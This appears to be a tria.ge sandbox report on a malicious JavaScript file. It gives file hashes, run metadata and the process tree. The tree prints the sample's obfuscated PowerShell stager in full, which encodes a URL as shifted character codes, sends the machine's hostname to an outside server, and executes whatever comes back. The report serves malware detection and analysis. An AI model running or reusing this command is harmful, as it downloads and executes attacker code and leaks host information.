Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

NUVW1369.js

windows10-1703-x64

10

NUVW1369.js

windows7-x64

10

NUVW1369.js

windows10-2004-x64

10

Analysis

  • max time kernel
    401s
  • max time network
    403s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    26/05/2023, 16:31

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    NUVW1369.js

  • Size

    747KB

  • MD5

    7cf38440c1bab5520f29ea4f50ec50c1

  • SHA1

    93ba640988fc04fda650ed22861460bb4a8a4768

  • SHA256

    b535dc0e3da92ff7112c9d6b8e49ed32f826554343bd16ea0b32599ee5b5c4ae

  • SHA512

    a1493b99043bc2351b1caa470f6509b7b5a88a1d3b0456917548a36882ac6603fd2e346e4869af63766abf195221601c9f2bde92f81270170098f3f809bebd22

  • SSDEEP

    3072:yTXYmBNLkwZRnXAjoxS7wCXde+pj/uzLLLNQaAapwxDY/YhNkskLJ9KR9CHccVoZ:GyWbCpN4U

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\NUVW1369.js
    1⤵
      PID:2040
    • C:\Windows\system32\conhost.exe
      conhost --headless powershell @(2554,2566,2566,2562,2508,2497,2497,2565,2550,2552,2568,2565,2496,2566,2561,2562,2497,2564,2566,2496,2562,2554,2562,2513,2555,2511)|foreach{$ofebnw=$ofebnw+[char]($_-2450)};$rplotc='l';new-alias tfyfx cur$rplotc;$sibz=$(hostname);.$([char](7892-7787)+'ex')(tfyfx -useb "$ofebnw$sibz")
      1⤵
      • Process spawned unexpected child process
      PID:1328

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads